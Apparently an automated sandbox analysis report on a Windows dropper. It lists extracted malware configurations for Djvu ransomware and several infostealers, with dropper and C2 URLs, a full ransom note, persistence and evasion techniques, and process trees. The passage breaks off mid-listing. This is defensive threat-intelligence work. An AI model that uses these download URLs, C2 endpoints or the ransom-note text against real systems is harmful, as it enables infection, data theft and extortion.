djvu | 88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad

Analysis

max time kernel
154s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 10:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe
Size

8.0MB
MD5

34a84215a10540b6f206158223704454
SHA1

3be06944ff89e09555b721a30ad0acdc650ec655
SHA256

88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad
SHA512

db222a6d5988f00c27e98c5a7fe3451e33f7f9f50c58295d7ac66cd33101d0644bee370a47a1443e85b8ab03d30b60300593617241a85481ceac2cb0384543fb

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

a26fbf1c2d0b49bb23b4438deef490ea1c53ab14

Attributes

url4cnc
http://85.159.212.113/maverixsa
http://185.163.204.81/maverixsa
http://194.180.191.33/maverixsa
http://174.138.11.98/maverixsa
http://194.180.191.44/maverixsa
http://91.219.236.120/maverixsa
https://t.me/maverixsa

rc4.plain

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

PRO1203PRO

144.76.173.68:16125

Attributes

auth_value
7a7fbf2ba1c874d2d5050d9184bd1348

Signatures

Detected Djvu ransomware 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4464-245-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5280-250-0x0000000002210000-0x000000000232B000-memory.dmp	family_djvu
behavioral2/memory/4464-248-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4464-244-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4464-260-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/312-274-0x00000000056C0000-0x0000000005C64000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2664-191-0x0000000005260000-0x0000000005B86000-memory.dmp	family_glupteba
behavioral2/memory/2664-194-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 2328 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	2328	rUNdlL32.eXe

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3980-318-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4316 created 2664 4316 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 4316 created 2664	4316	svchost.exe	Info.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4304-281-0x0000000000600000-0x0000000000644000-memory.dmp	family_onlylogger
behavioral2/memory/4304-282-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3108-239-0x0000000000400000-0x00000000004CE000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 17 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeFolder.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeInfo.exeQfCggr3jPU6jnzBJQpaByqyD.exe2e1UWhMqbyMyDgr_blyZ2Up0.exe_iWBenfy50y_rzwGAZ0emopl.exeAknDyySPWKfRlNvB7xWkiS92.exe

pid	process
1336	SoCleanInst.exe
2096	md9_1sjm.exe
2232	Folder.exe
2664	Info.exe
5008	Updbdate.exe
4684	Folder.exe
3320	Install.exe
3932	Files.exe
2280	pub2.exe
4904	File.exe
992	jfiag3g_gg.exe
4600	jfiag3g_gg.exe
5084	Info.exe
2928	QfCggr3jPU6jnzBJQpaByqyD.exe
3480	2e1UWhMqbyMyDgr_blyZ2Up0.exe
3108	_iWBenfy50y_rzwGAZ0emopl.exe
312	AknDyySPWKfRlNvB7xWkiS92.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\1KRlDsROQBnPEVz85G1xU6nU.exe	upx
C:\Users\Admin\Pictures\Adobe Films\1KRlDsROQBnPEVz85G1xU6nU.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exeFolder.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3308 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3308	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

256 ipinfo.io
258 ipinfo.io
259 ipinfo.io
284 ipinfo.io
13 ip-api.com
115 ipinfo.io
116 ipinfo.io
240 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
256	ipinfo.io
258	ipinfo.io
259	ipinfo.io
284	ipinfo.io
13	ip-api.com
115	ipinfo.io
116	ipinfo.io
240	ipinfo.io

Program crash 37 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5000	3308	WerFault.exe	rundll32.exe
4744	2664	WerFault.exe	Info.exe
4724	2664	WerFault.exe	Info.exe
1408	2664	WerFault.exe	Info.exe
4056	2664	WerFault.exe	Info.exe
4292	2664	WerFault.exe	Info.exe
4088	2664	WerFault.exe	Info.exe
1068	2664	WerFault.exe	Info.exe
4628	2664	WerFault.exe	Info.exe
4572	2664	WerFault.exe	Info.exe
1464	2664	WerFault.exe	Info.exe
1296	2664	WerFault.exe	Info.exe
4832	2664	WerFault.exe	Info.exe
4716	2664	WerFault.exe	Info.exe
3512	2664	WerFault.exe	Info.exe
3848	2664	WerFault.exe	Info.exe
1172	2664	WerFault.exe	Info.exe
2076	2664	WerFault.exe	Info.exe
3040	2664	WerFault.exe	Info.exe
3252	2664	WerFault.exe	Info.exe
4156	2664	WerFault.exe	Info.exe
3104	2664	WerFault.exe	Info.exe
5240	3480	WerFault.exe	2e1UWhMqbyMyDgr_blyZ2Up0.exe
5740	800	WerFault.exe	hUTdmx27HiJbCRxdOKtyjYLg.exe
5808	3396	WerFault.exe	l4t3Vtx643Lx4fpdmLss1hAE.exe
5820	4304	WerFault.exe	UtKAHgLnObtMTFMPnTwtLNM7.exe
4224	3480	WerFault.exe	2e1UWhMqbyMyDgr_blyZ2Up0.exe
6700	4228	WerFault.exe	hCBdWcL92S6RV8genjuETijf.exe
6512	4304	WerFault.exe	UtKAHgLnObtMTFMPnTwtLNM7.exe
6644	5084	WerFault.exe	Info.exe
5724	5084	WerFault.exe	Info.exe
5740	6256	WerFault.exe	H4GDUk49DQp4KlpkZ3Tj8Iii.exe
6464	5084	WerFault.exe	Info.exe
1500	5084	WerFault.exe	Info.exe
5484	3976	WerFault.exe	igQUkjiwIvHw9vICd10JbBjW.exe
6872	4304	WerFault.exe	UtKAHgLnObtMTFMPnTwtLNM7.exe
3572	5084	WerFault.exe	Info.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5284 schtasks.exe
5544 schtasks.exe

pid	process
5284	schtasks.exe
5544	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4356 taskkill.exe

pid	process
4356	taskkill.exe

Modifies registry class 2 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exejfiag3g_gg.exepub2.exemsedge.exe

pid	process
3984	msedge.exe
3984	msedge.exe
4600	jfiag3g_gg.exe
4600	jfiag3g_gg.exe
2280	pub2.exe
2280	pub2.exe
4272	msedge.exe
4272	msedge.exe
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

2280 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

4272 msedge.exe
4272 msedge.exe
4272 msedge.exe
4272 msedge.exe

pid	process
2280	pub2.exe

pid	process
4272	msedge.exe
4272	msedge.exe
4272	msedge.exe
4272	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	1336	SoCleanInst.exe
Token: SeCreateTokenPrivilege	3320	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3320	Install.exe
Token: SeLockMemoryPrivilege	3320	Install.exe
Token: SeIncreaseQuotaPrivilege	3320	Install.exe
Token: SeMachineAccountPrivilege	3320	Install.exe
Token: SeTcbPrivilege	3320	Install.exe
Token: SeSecurityPrivilege	3320	Install.exe
Token: SeTakeOwnershipPrivilege	3320	Install.exe
Token: SeLoadDriverPrivilege	3320	Install.exe
Token: SeSystemProfilePrivilege	3320	Install.exe
Token: SeSystemtimePrivilege	3320	Install.exe
Token: SeProfSingleProcessPrivilege	3320	Install.exe
Token: SeIncBasePriorityPrivilege	3320	Install.exe
Token: SeCreatePagefilePrivilege	3320	Install.exe
Token: SeCreatePermanentPrivilege	3320	Install.exe
Token: SeBackupPrivilege	3320	Install.exe
Token: SeRestorePrivilege	3320	Install.exe
Token: SeShutdownPrivilege	3320	Install.exe
Token: SeDebugPrivilege	3320	Install.exe
Token: SeAuditPrivilege	3320	Install.exe
Token: SeSystemEnvironmentPrivilege	3320	Install.exe
Token: SeChangeNotifyPrivilege	3320	Install.exe
Token: SeRemoteShutdownPrivilege	3320	Install.exe
Token: SeUndockPrivilege	3320	Install.exe
Token: SeSyncAgentPrivilege	3320	Install.exe
Token: SeEnableDelegationPrivilege	3320	Install.exe
Token: SeManageVolumePrivilege	3320	Install.exe
Token: SeImpersonatePrivilege	3320	Install.exe
Token: SeCreateGlobalPrivilege	3320	Install.exe
Token: 31	3320	Install.exe
Token: 32	3320	Install.exe
Token: 33	3320	Install.exe
Token: 34	3320	Install.exe
Token: 35	3320	Install.exe
Token: SeDebugPrivilege	4356	taskkill.exe
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeManageVolumePrivilege	2096	md9_1sjm.exe
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

msedge.exe

pid process

4272 msedge.exe
4272 msedge.exe
4272 msedge.exe
2712

pid	process
4272	msedge.exe
4272	msedge.exe
4272	msedge.exe
2712

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exeFolder.exeFiles.exemsedge.exeInstall.exerUNdlL32.eXecmd.exe

description	pid	process	target process
PID 3304 wrote to memory of 1336	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	SoCleanInst.exe
PID 3304 wrote to memory of 1336	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	SoCleanInst.exe
PID 3304 wrote to memory of 2096	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	md9_1sjm.exe
PID 3304 wrote to memory of 2096	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	md9_1sjm.exe
PID 3304 wrote to memory of 2096	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	md9_1sjm.exe
PID 3304 wrote to memory of 2232	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Folder.exe
PID 3304 wrote to memory of 2232	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Folder.exe
PID 3304 wrote to memory of 2232	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Folder.exe
PID 3304 wrote to memory of 2664	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Info.exe
PID 3304 wrote to memory of 2664	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Info.exe
PID 3304 wrote to memory of 2664	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Info.exe
PID 3304 wrote to memory of 5008	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Updbdate.exe
PID 3304 wrote to memory of 5008	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Updbdate.exe
PID 3304 wrote to memory of 5008	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Updbdate.exe
PID 2232 wrote to memory of 4684	2232	Folder.exe	Folder.exe
PID 2232 wrote to memory of 4684	2232	Folder.exe	Folder.exe
PID 2232 wrote to memory of 4684	2232	Folder.exe	Folder.exe
PID 3304 wrote to memory of 3320	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Install.exe
PID 3304 wrote to memory of 3320	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Install.exe
PID 3304 wrote to memory of 3320	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Install.exe
PID 3304 wrote to memory of 3932	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Files.exe
PID 3304 wrote to memory of 3932	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Files.exe
PID 3304 wrote to memory of 3932	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	Files.exe
PID 3304 wrote to memory of 2280	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	pub2.exe
PID 3304 wrote to memory of 2280	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	pub2.exe
PID 3304 wrote to memory of 2280	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	pub2.exe
PID 3304 wrote to memory of 4904	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	File.exe
PID 3304 wrote to memory of 4904	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	File.exe
PID 3304 wrote to memory of 4904	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	File.exe
PID 3932 wrote to memory of 992	3932	Files.exe	jfiag3g_gg.exe
PID 3932 wrote to memory of 992	3932	Files.exe	jfiag3g_gg.exe
PID 3932 wrote to memory of 992	3932	Files.exe	jfiag3g_gg.exe
PID 3304 wrote to memory of 4272	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	msedge.exe
PID 3304 wrote to memory of 4272	3304	88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe	msedge.exe
PID 4272 wrote to memory of 1716	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 1716	4272	msedge.exe	msedge.exe
PID 3320 wrote to memory of 3024	3320	Install.exe	cmd.exe
PID 3320 wrote to memory of 3024	3320	Install.exe	cmd.exe
PID 3320 wrote to memory of 3024	3320	Install.exe	cmd.exe
PID 1688 wrote to memory of 3308	1688	rUNdlL32.eXe	rundll32.exe
PID 1688 wrote to memory of 3308	1688	rUNdlL32.eXe	rundll32.exe
PID 1688 wrote to memory of 3308	1688	rUNdlL32.eXe	rundll32.exe
PID 3024 wrote to memory of 4356	3024	cmd.exe	taskkill.exe
PID 3024 wrote to memory of 4356	3024	cmd.exe	taskkill.exe
PID 3024 wrote to memory of 4356	3024	cmd.exe	taskkill.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe
PID 4272 wrote to memory of 3556	4272	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe
"C:\Users\Admin\AppData\Local\Temp\88e0a313459fc41a3231b2415a32a8bf9dbf29d591ef1fdcc6b5cfd0593072ad.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3304

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2232

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:4684

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 368
3⤵
- Program crash
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 376
3⤵
- Program crash
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 376
3⤵
- Program crash
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 648
3⤵
- Program crash
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 708
3⤵
- Program crash
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 708
3⤵
- Program crash
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 736
3⤵
- Program crash
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 744
3⤵
- Program crash
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 736
3⤵
- Program crash
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 608
3⤵
- Program crash
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 852
3⤵
- Program crash
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 776
3⤵
- Program crash
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 760
3⤵
- Program crash
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 840
3⤵
- Program crash
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 792
3⤵
- Program crash
PID:3848

C:\Windows\SysWOW64\WerFault.exe
